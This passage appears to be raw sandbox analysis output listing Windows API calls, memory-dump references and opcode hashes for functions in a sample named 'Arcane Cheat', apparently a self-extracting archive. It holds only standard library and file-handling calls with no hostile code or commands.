                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: EnvironmentVariable
                                  • String ID: sfxcmd$sfxpar
                                  • API String ID: 1431749950-3493335439
                                  • Opcode ID: db7a66dce7a8e979a5e1648b984840e30a5671c2ef560a5d231f31747895d24d
                                  • Instruction ID: eaf956ce3516680ce0be95702f35704de20cca0c8230d7728c795926878005cb
                                  • Opcode Fuzzy Hash: db7a66dce7a8e979a5e1648b984840e30a5671c2ef560a5d231f31747895d24d
                                  • Instruction Fuzzy Hash: 41F0A771801738A7DB202F94AC19EFA7768FF09B93F000121FD44D6281D664DD40DAF1

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0082985E
                                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00829876
                                  • GetLastError.KERNEL32 ref: 008298A8
                                  • GetLastError.KERNEL32 ref: 008298C7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLast$FileHandleRead
                                  • String ID:
                                  • API String ID: 2244327787-0
                                  • Opcode ID: 2fc07ffc882ccfbf2f697315decb64b23166b102c6014b1f932832936a6ecf25
                                  • Instruction ID: c47005aa0c168dbacd0f81cbad16a5364984d11e73bd73a6b8a8a16c8b526ed7
                                  • Opcode Fuzzy Hash: 2fc07ffc882ccfbf2f697315decb64b23166b102c6014b1f932832936a6ecf25
                                  • Instruction Fuzzy Hash: A0118630900728EFDB205B65E80497A77ACFB07771F18853AF8AAC5990E7359DC09F62
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00843713,00000000,00000000,?,0084A49B,00843713,00000000,00000000,00000000,?,0084A698,00000006,FlsSetValue), ref: 0084A526
                                  • GetLastError.KERNEL32(?,0084A49B,00843713,00000000,00000000,00000000,?,0084A698,00000006,FlsSetValue,00857348,00857350,00000000,00000364,?,00849077), ref: 0084A532
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0084A49B,00843713,00000000,00000000,00000000,?,0084A698,00000006,FlsSetValue,00857348,00857350,00000000), ref: 0084A540
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 71f176c53f56e540ee825f03f8f1f198249286f18a9e78a6cd157fb2ed441bc0
                                  • Instruction ID: d0d4082de4cf9a1da5173fec8aa5e881ea912dddcd9bdb1fcf62200c2dc0cb35
                                  • Opcode Fuzzy Hash: 71f176c53f56e540ee825f03f8f1f198249286f18a9e78a6cd157fb2ed441bc0
                                  • Instruction Fuzzy Hash: 4001FC3269172AABC7258AB89C44A56BB5CFF45BA27120521F90ADB140D725D900C6D1
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0082CC94,00000001,?,?,?,00000000,00834ECD,?,?,?), ref: 00829F4C
                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00834ECD,?,?,?,?,?,00834972,?), ref: 00829F8E
                                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0082CC94,00000001,?,?), ref: 00829FB8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileWrite$Handle
                                  • String ID:
                                  • API String ID: 4209713984-0
                                  • Opcode ID: aa12a78935b7f5605725f03711edbc450b5bc4abc4df070a4ec073984f94d0be
                                  • Instruction ID: f686eb6965b0d0c80117f1942cdea595e22e0f7a888958cec44871a12ef14aa7
                                  • Opcode Fuzzy Hash: aa12a78935b7f5605725f03711edbc450b5bc4abc4df070a4ec073984f94d0be
                                  • Instruction Fuzzy Hash: FE3124312087259BDF548F24EA48B6ABBA8FF50751F04455CF985DB281CB74DD88CBA2
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A22E
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A261
                                  • GetLastError.KERNEL32(?,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A27E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$ErrorLast
                                  • String ID:
                                  • API String ID: 2485089472-0
                                  • Opcode ID: 11fa5853abc7a436b459cdf85148b46237f782611ab23df9d145fb9dc55671c4
                                  • Instruction ID: 2e4ef9b2976de32eaa6ccd52e92e5b443bce1740a008e04f2e761caafe1ce916
                                  • Opcode Fuzzy Hash: 11fa5853abc7a436b459cdf85148b46237f782611ab23df9d145fb9dc55671c4
                                  • Instruction Fuzzy Hash: 69019231141678E7DB3AAB68AC05BEE3349FF06B92F144451F901E6091D766CAC186A7
                                  APIs
                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0084B019
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Info
                                  • String ID:
                                  • API String ID: 1807457897-3916222277
                                  • Opcode ID: e7ae45c410d68f0f71876f7f89c9f83c7f8fe28f1ec6e2dcdc9dfad38749e565
                                  • Instruction ID: da3025a649b4c75f40c2a987ab2241f5aa026ffbac0a374bc50b0d4c62ecbda9
                                  • Opcode Fuzzy Hash: e7ae45c410d68f0f71876f7f89c9f83c7f8fe28f1ec6e2dcdc9dfad38749e565
                                  • Instruction Fuzzy Hash: 1A41147050478CABDB228A288C94AEABBA9FB45308F1404EDE59AC7142E335DA45DF20
                                  APIs
                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0084A79D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: String
                                  • String ID: LCMapStringEx
                                  • API String ID: 2568140703-3893581201
                                  • Opcode ID: e894e86f2a04f99c5eb5fe3f91db842f210221da4e16e7b53c27204899690d46
                                  • Instruction ID: 77b972559aa476f52ed884605d3bf91cbfc19c6d7ef2c721fd3b4ebfc209e947
                                  • Opcode Fuzzy Hash: e894e86f2a04f99c5eb5fe3f91db842f210221da4e16e7b53c27204899690d46
                                  • Instruction Fuzzy Hash: 7D01483254020CBBCF165FA4DC02DEE3F66FF08765F408154FE14A9260CA368A31EB92
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00849D2F), ref: 0084A715
                                  Strings
                                  • InitializeCriticalSectionEx, xrefs: 0084A6E5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CountCriticalInitializeSectionSpin
                                  • String ID: InitializeCriticalSectionEx
                                  • API String ID: 2593887523-3084827643
                                  • Opcode ID: 92662848e29ca4f1e5ff050af900a2e9dd98fa14b237749662fa700e596c2ec6
                                  • Instruction ID: f41dc866c602fd533eda89342aec49e2d3e17ab6ca7783ccce106f3d959bcca1
                                  • Opcode Fuzzy Hash: 92662848e29ca4f1e5ff050af900a2e9dd98fa14b237749662fa700e596c2ec6
                                  • Instruction Fuzzy Hash: 84F0BE3168520CBBCB156F64DC06CAEBFA1FF54762B808094FC199A360DA764A10EB92
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Alloc
                                  • String ID: FlsAlloc
                                  • API String ID: 2773662609-671089009
                                  • Opcode ID: 9e8aea62fd18f5e4867a5a9ff75afaf990264eef8cd77cff798afb80b08636aa
                                  • Instruction ID: 236c75495e992b58cf9d7969626f4c43c9d7ffa0c314935d200a50816f95c21d
                                  • Opcode Fuzzy Hash: 9e8aea62fd18f5e4867a5a9ff75afaf990264eef8cd77cff798afb80b08636aa
                                  • Instruction Fuzzy Hash: 11E0553078532C6B86186FA49C028AEBB90FB24723B814098FC05DB340DD780F00D6D6
                                  APIs
                                  • try_get_function.LIBVCRUNTIME ref: 008432AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: try_get_function
                                  • String ID: FlsAlloc
                                  • API String ID: 2742660187-671089009
                                  • Opcode ID: adf8bd8c1bb862485e455d1d7c1ea0c78e3245ea1e9a485ac8472cdc8a44ff2f
                                  • Instruction ID: 5ea08520de260ce4c8cbc736aba79eb9076c68ca37c16a6e88b445436defab2f
                                  • Opcode Fuzzy Hash: adf8bd8c1bb862485e455d1d7c1ea0c78e3245ea1e9a485ac8472cdc8a44ff2f
                                  • Instruction Fuzzy Hash: 3CD02B21780B786A811032D46C13AAE7FC4F701FF3F450152FE08DA382E5A9450102C6
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083E20B
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID: 3To
                                  • API String ID: 1269201914-245939750
                                  • Opcode ID: d2cd2c8ef8a7aba84efeaf92932ac1e868520d9071251bac5b8c4f014d0e95f9
                                  • Instruction ID: c01530e5dca25ed70a48a8395b147f785240316b20ee8783b2f86c74524b080e
                                  • Opcode Fuzzy Hash: d2cd2c8ef8a7aba84efeaf92932ac1e868520d9071251bac5b8c4f014d0e95f9
                                  • Instruction Fuzzy Hash: 54B012E126E1027D320C2145BD0FC37031CF4C0B51730801AB615D80C09A405C0D4073
                                  APIs
                                    • Part of subcall function 0084AF1B: GetOEMCP.KERNEL32(00000000,?,?,0084B1A5,?), ref: 0084AF46
                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0084B1EA,?,00000000), ref: 0084B3C4
                                  • GetCPInfo.KERNEL32(00000000,0084B1EA,?,?,?,0084B1EA,?,00000000), ref: 0084B3D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CodeInfoPageValid
                                  • String ID:
                                  • API String ID: 546120528-0
                                  • Opcode ID: adf3311fb6252ea8191b487292f7506fa70febf2ea7cfcfa1afb73f14053e5c9
                                  • Instruction ID: 6e248876fbff39d900da385426438f5264bc4949d5b9e86011df46c3887601ce
                                  • Opcode Fuzzy Hash: adf3311fb6252ea8191b487292f7506fa70febf2ea7cfcfa1afb73f14053e5c9
                                  • Instruction Fuzzy Hash: FC5134B0A0030D9EDB288F75C8816BABBE5FF54314F1880AED096CB253D739D946CB95
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00826057: __EH_prolog.LIBCMT ref: 0082605C
                                    • Part of subcall function 0082C827: __EH_prolog.LIBCMT ref: 0082C82C
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C86F
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C893
                                  • new.LIBCMT ref: 008213FE
                                    • Part of subcall function 0082B07D: __EH_prolog.LIBCMT ref: 0082B082
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: c38deec1f285bf8cd03742e9f453a9903982e2e1e6b77aa20bcf6a5881bbb00f
                                  • Instruction ID: 83ac97b1b6ca59ff58209efa825bf83f4cadcb0402d3bd582f2fb5d30227ce41
                                  • Opcode Fuzzy Hash: c38deec1f285bf8cd03742e9f453a9903982e2e1e6b77aa20bcf6a5881bbb00f
                                  • Instruction Fuzzy Hash: DE4127B0805B409ED724DF7984859E7FBE5FB28300F504A2ED6EEC3282DB326554CB56
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00826057: __EH_prolog.LIBCMT ref: 0082605C
                                    • Part of subcall function 0082C827: __EH_prolog.LIBCMT ref: 0082C82C
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C86F
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C893
                                  • new.LIBCMT ref: 008213FE
                                    • Part of subcall function 0082B07D: __EH_prolog.LIBCMT ref: 0082B082
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: f6e11d456df0fe06e89dae76ffdb013db63f7a4355275a66211ce89c3563bcbf
                                  • Instruction ID: a11eeca008609cbdf72401c16e76782659accbfd2b018b35aeefd9d3e2f434cb
                                  • Opcode Fuzzy Hash: f6e11d456df0fe06e89dae76ffdb013db63f7a4355275a66211ce89c3563bcbf
                                  • Instruction Fuzzy Hash: 6841F6B0805B409ED724DF7984859E7FAE5FB28300F504A6ED6EEC3282DB326554CB56
                                  APIs
                                    • Part of subcall function 00848FA5: GetLastError.KERNEL32(?,00860EE8,00843E14,00860EE8,?,?,00843713,00000050,?,00860EE8,00000200), ref: 00848FA9
                                    • Part of subcall function 00848FA5: _free.LIBCMT ref: 00848FDC
                                    • Part of subcall function 00848FA5: SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 0084901D
                                    • Part of subcall function 00848FA5: _abort.LIBCMT ref: 00849023
                                    • Part of subcall function 0084B2AE: _abort.LIBCMT ref: 0084B2E0
                                    • Part of subcall function 0084B2AE: _free.LIBCMT ref: 0084B314
                                    • Part of subcall function 0084AF1B: GetOEMCP.KERNEL32(00000000,?,?,0084B1A5,?), ref: 0084AF46
                                  • _free.LIBCMT ref: 0084B200
                                  • _free.LIBCMT ref: 0084B236
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorLast_abort
                                  • String ID:
                                  • API String ID: 2991157371-0
                                  • Opcode ID: 8ad8375f9cdc18894321629bba4d29861f07c95c193039defb3e84685c933ad8
                                  • Instruction ID: 819ed0a8e8caaf2c5579444ed8ae44181250d693cba7421022600702b192016b
                                  • Opcode Fuzzy Hash: 8ad8375f9cdc18894321629bba4d29861f07c95c193039defb3e84685c933ad8
                                  • Instruction Fuzzy Hash: D731DF3190420CAFDB14EFA9C841AADBBE5FF44320F254099E814DB291EBB29E41CB41
                                  APIs
                                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00829EDC,?,?,00827867), ref: 008297A6
                                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00829EDC,?,?,00827867), ref: 008297DB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 88fd8b9132c623e3172632f7dee4d87aad482b5fe91000ee16f6ac2947867cce
                                  • Instruction ID: edc84713026ca81b234c2f13149f4c765149d6cbf8d3fc64b904c3009434bdc7
                                  • Opcode Fuzzy Hash: 88fd8b9132c623e3172632f7dee4d87aad482b5fe91000ee16f6ac2947867cce
                                  • Instruction Fuzzy Hash: 2821F3B1110758AFE7308F64D885BA7B7E8FB49764F00492DF5E5C21D1C374AC889B61
                                  APIs
                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00827547,?,?,?,?), ref: 00829D7C
                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00829E2C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File$BuffersFlushTime
                                  • String ID:
                                  • API String ID: 1392018926-0
                                  • Opcode ID: 600fd2142d3811d2d057e2678e310dfaff5297b5ffd65e2260bed45bab4e15c7
                                  • Instruction ID: ac95031426162ca3bcd38922bb10f11396661301964c15578678886cb7d241ea
                                  • Opcode Fuzzy Hash: 600fd2142d3811d2d057e2678e310dfaff5297b5ffd65e2260bed45bab4e15c7
